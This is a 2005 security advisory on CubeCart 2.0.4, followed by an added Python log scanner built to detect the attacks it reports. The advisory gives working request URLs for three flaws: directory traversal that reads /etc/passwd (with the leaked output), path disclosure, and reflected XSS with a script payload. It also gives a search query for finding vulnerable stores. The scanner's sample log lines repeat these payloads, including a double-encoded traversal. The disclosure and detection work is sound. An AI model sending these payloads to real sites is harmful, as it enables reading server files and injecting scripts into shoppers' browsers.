
CubeCart204.txt

25 Feb 2005 | Reported by John Cobb | Type: packetstorm | Source: packetstormsecurity.com

Remote vulnerabilities found in CubeCart 2.0.4 affecting over 150,000 websites.

Code
`Hello All,  
  
I have discovered a number of remote vulnerabilities in: CubeCart 2.0.4.  
  
Authors Site: http://www.cubecart.com  
  
CubeCart is described by its authors as:  
  
'What is CubeCart?  
CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you  
can setup a powerful online store as long as you have hosting supporting PHP  
and one MySQL database.'  
  
A quick check on Google reveals there are a possible 150,000+ websites  
possibly vulnerable:  
  
http://www.google.co.uk/search?hl=en&safe=off&q=%22%28powered+by+CubeCart%29%22&btnG=Search&meta=  
  
+-[Examples:]--------------------------------------------------+  
  
[1]------------------------------------------------------------+  
  
Directory Traversal:  
  
http://www.victimsite.com/index.php?&language=../../../../../../../../etc/passwd  
  
Result:  
  
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:  
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin  
operator:x:11:0:operator:/root:/sbin/nologin  
games:x:12:100:games:/usr/games:/sbin/nologin  
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP  
User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin  
rpm:x:37:37::/var/lib/rpm:/bin/bash vcsa:x:69:69:virtual console memory  
owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin  
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin  
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service  
User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS  
User:/var/lib/nfs:/sbin/nologin  
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin  
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin  
pcap:x:77:77::/var/arpwatch:/sbin/nologin  
apache:x:48:48:Apache:/var/www:/sbin/nologin  
squid:x:23:23::/var/spool/squid:/sbin/nologin  
webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin xfs:x:43:43:X  
Font Server:/etc/X11/fs:/sbin/nologin  
named:x:25:25:Named:/var/named:/sbin/nologin  
ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin  
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash  
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash  
johnc:x:500:500:johnc:/home/johnc:/bin/bash   
Warning: Cannot add header information - headers already sent by (output  
started at /etc/passwd:11) in  
/var/www/virtual/www.victimsite.com/html/shoppingcart.php on line 44   
  
[2]------------------------------------------------------------+  
  
Path Disclosure:  
  
http://www.victimsite.com/index.php?&language=w00t  
  
Result:  
  
Warning: Failed opening  
'/var/www/virtual/www.victimsite.com/html/admin/lang/w00t' for inclusion  
(include_path='.:/usr/share/pear') in  
/var/www/virtual/www.victimsite.com/html/admin/settings.inc.php on line 134  
  
Warning: Cannot add header information - headers already sent by (output  
started at  
/var/www/virtual/www.victimsite.com/html/admin/settings.inc.php:134) in  
/var/www/virtual/www.victimsite.com/html/shoppingcart.php on line 44   
  
[3]------------------------------------------------------------+  
  
XSS:  
  
http://www.victimsite.com/index.php?&language=<script>var%20test_variable=31337;alert(test_variable);</script>  
  
Result:  
  
A nice pop up box.  
  
+-[Notes:]-----------------------------------------------------+  
  
Vulnerabilities found on: 09/02/2005  
Author(s) Informed on: 11/02/2005  
Author(s) Response: 13/02/2005  
Author(s) Fix: 14/02/2005  
  
  
Regards  
  
John Cobb  
  
[email protected]  
  
http://www.NoBytes.com  
  
`
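
A log check for the three kinds of `language` request the advisory shows, as an added example that is not part of the original advisory or of CubeCart's code: it scans web-server access-log lines and flags `language` values that carry path traversal, markup, or any other value outside an expected set. The log format, the sample lines, and the `SAFE_VALUE` pattern for legitimate language names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: legitimate values are short plain tokens such as "en" or "en_GB";
# tune this to the language names your store actually ships.
SAFE_VALUE = re.compile(r"^[A-Za-z]{2,10}(?:[_-][A-Za-z]{2,10})?$")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_language(value):
    """Return 'ok', 'markup', 'traversal' or 'unexpected' for one parameter value."""
    v = fully_decode(value)
    if "<" in v or ">" in v:
        return "markup"        # script injection attempt (advisory example 3)
    if ".." in v or "/" in v or "\\" in v or "\x00" in v:
        return "traversal"     # path escape attempt (advisory example 1)
    return "ok" if SAFE_VALUE.match(v) else "unexpected"  # e.g. error probing (example 2)

def scan(lines):
    """Return (line_number, verdict, decoded_value) for each suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        for raw in parse_qs(urlsplit(m.group(1)).query).get("language", []):
            verdict = classify_language(raw)
            if verdict != "ok":
                findings.append((n, verdict, fully_decode(raw)))
    return findings

SAMPLE_LOG = [  # constructed access-log lines, not captured traffic
    '192.0.2.10 - - [25/Feb/2005:10:00:01 +0000] "GET /index.php?language=en HTTP/1.1" 200 5120',
    '192.0.2.44 - - [25/Feb/2005:10:00:07 +0000] "GET /index.php?&language=../../../../etc/passwd HTTP/1.1" 200 1893',
    '192.0.2.44 - - [25/Feb/2005:10:00:09 +0000] "GET /index.php?&language=w00t HTTP/1.1" 200 742',
    '192.0.2.44 - - [25/Feb/2005:10:00:12 +0000] "GET /index.php?&language=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 760',
    '192.0.2.44 - - [25/Feb/2005:10:00:15 +0000] "GET /index.php?language=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1893',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same classification can run as a request-time allowlist in front of the application, so that anything other than `ok` is rejected before the value reaches a file path or the page output.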
